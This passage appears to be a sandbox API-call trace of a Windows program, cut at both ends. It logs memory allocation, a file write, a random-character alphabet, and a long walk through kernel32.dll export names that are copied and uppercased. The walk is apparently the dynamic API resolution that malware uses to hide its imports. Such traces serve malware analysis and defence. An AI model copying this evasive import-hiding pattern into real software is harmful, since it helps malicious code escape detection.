(lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0076.817] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.817] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0076.818] CloseHandle (hObject=0x464) returned 1 [0076.818] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.818] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0076.819] CloseHandle (hObject=0x0) returned 0 [0076.819] CloseHandle (hObject=0x460) returned 1 [0076.819] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.820] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.820] GetTickCount () returned 0x114bb73 [0076.820] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.820] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.820] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.821] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.821] lstrlenA (lpString="kernel32.dll") returned 12 [0076.821] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.821] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.821] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.821] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.821] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.821] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.821] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.821] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.821] lstrlenA (lpString="ADDATOMA") returned 8 [0076.821] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.821] lstrlenA (lpString="ADDATOMW") returned 8 [0076.821] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.821] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.821] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.821] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.821] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.821] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.821] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.822] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.822] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.822] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.822] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.822] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.822] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.822] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.822] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.822] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.822] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.822] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.822] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.822] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.822] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.822] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.822] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.822] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.822] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.822] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.822] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.823] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.823] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.823] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.823] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.823] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.823] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.823] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.823] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.823] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.823] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.823] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.823] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.823] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.823] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.823] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.823] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.823] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.823] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.823] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.823] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.824] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.824] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.824] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.824] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.824] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.824] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.824] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.824] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.824] lstrlenA (lpString="BEEP") returned 4 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.824] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.824] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.824] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.824] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.824] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.824] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.824] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.824] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.824] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.824] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.825] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.825] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.825] lstrlenA (lpString="CANCELIO") returned 8 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.825] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.825] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.825] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.825] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.825] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.825] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.825] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.825] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.825] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.825] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.825] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.825] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.825] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.825] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.825] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.825] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.826] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.826] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.826] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.826] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.826] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.826] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.826] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.826] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.826] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.826] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.826] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.826] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.827] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.827] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.827] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.827] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.827] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.827] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.827] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.827] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.827] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.827] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.827] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.827] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.827] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.827] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.827] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.828] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.828] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.828] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.828] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.828] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.828] lstrlenA (lpString="COPYFILEA") returned 9 [0076.828] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: 